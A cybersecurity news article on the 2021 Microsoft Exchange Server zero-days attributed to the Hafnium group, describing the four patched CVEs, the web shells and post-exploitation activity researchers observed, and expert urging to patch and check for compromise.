Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

Microsoft Exchange Zero-Day Attackers Spy on American Targets!

Microsoft Exchange Zero-Day Attackers Spy on American Targets!

Full dumps of email boxes, lateral movement & backdoors characterise sophisticated attacks by a Chinese APT – while other incidents spread rapidly.

Microsoft has discovered multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server.

Adversaries have been able to access email accounts, steal a raft of data drop malware on target machines for long-term remote access, according to the computing giant.

The attacks are “limited & targeted,” according to Microsoft, spurring it to release out-of-band patches this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 & CVE-2021-27065.

Compromising

However, other researchers have reported seeing the activity compromising many victim organisations.

“The team is seeing organisations of all shapes & sizes affected, including electricity companies, local/county governments, healthcare providers & banks/financial institutions, as well as small hotels, multiple senior citizen communities & other mid-market businesses,” a spokesperson at Huntress explained.

The culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (as the name of a rare chemical element), which has a history of targeting assets in the US with cyber-espionage campaigns.

Microsoft Threat Intelligence Center

Targets historically have included defence contractors, infectious disease researchers, law firms, non-governmental organisations (NGOs), policy think tanks & universities.

“Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored & operating out of China, based on observed victimology, tactics  procedures,” according to an announcement this week from Microsoft on the attacks.

“The fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week’s Patch Tuesday release leads us to believe the flaws are quite severe even if we don’t know the full scope of those attacks,” Satnam Narang, Staff Research Engineer at Tenable, suggested..

Patched Bugs

Microsoft patched following bugs this week, & admins should update accordingly:

  • CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.
  • CVE-2021-26857 is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.
  • CVE-2021-26858 and CVE-2021-27065 are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server – thus achieving remote code execution (RCE).

Researchers at Volexity originally uncovered the SSRF bug as part of an incident response & noted,

“This vulnerability is remotely exploitable & does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.”

No Authentication Whatsoever

They also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.

In addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was 1st observed in Jan.

“Based on what we know so far, exploitation of one of the 4 vulnerabilities requires no authentication whatsoever & can be used to potentially download messages from a targeted user’s mailbox,” observed Tenable’s Narang.

“The other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organisation’s network.”

Compromised Servers

In the observed campaigns, the 4 zero-day bugs were used to gain initial access to targeted Exchange servers & achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data & expand the attack, according to researchers.

“In all cases of RCE, Volexity has observed the attacker writing web shells (ASPX files) to disk & conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) & move laterally to other systems & environments,” says Volexity’s writeup.

Post-Exploitation Activity

Following web shell deployment, Microsoft found that Hafnium operators performed this range of post-exploitation activity:

  • Using Procdump to dump the LSASS process memory;
  • Using 7-Zip to compress stolen data into ZIP files for exfiltration;
  • Adding and using Exchange PowerShell snap-ins to export mailbox data;
  • Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;
  • And downloading Power Cat from GitHub, then using it to open a connection to a remote server.

Offline Address Book

The attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organisation & its users, according to the analysis.

“The good news for defenders is that the post-exploitation activity is very detectable,” said Katie Nickels, director of intelligence at Red Canary, suggested, adding her firm has found many attacks as well. “Some of the activity we observed uses the China Chopper web shell, which has been around for more than 8 years, giving defenders ample time to develop detection logic for it.”

Hafnium APT

Hafnium has been tracked by Microsoft before, but the company has only just released a few details on the APT.

In terms of its tactics, “Hafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, & has used legitimate open-source frameworks, like Covenant, for command & control,” according to Microsoft. “Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.”

Hafnium operates primarily from leased virtual private servers in the United States, and primarily goes after US targets, but is linked to the Chinese Govt., according to Microsoft. It characterises the APT as “a highly skilled & sophisticated actor.”

More Attacks Soon

It should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat players targeting other regions, according to Narang.

“We expect other threat actors to begin leveraging these vulnerabilities in the coming days & weeks, which is why it is critically important for organisations that use Exchange Server to apply these patches immediately,” he added.

Indeed, researchers at Huntress explained they have discovered more than 100 web shells deployed across about 1,500 vulnerable servers (with antivirus & endpoint detection/recovery installed) & expect the number to increase.

Review their Systems

They are not alone.

“FireEye has observed these vulnerabilities being exploited in the wild & we are actively working with several impacted organisations,” Charles Carmakal, Senior VP & CTO at FireEye Mandiant observed. “In addition to patching as soon as possible, we recommend organisations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.”

https://www.cybernewsgroup.co.uk/virtual-conference-march-2021/

 

SHARE ARTICLE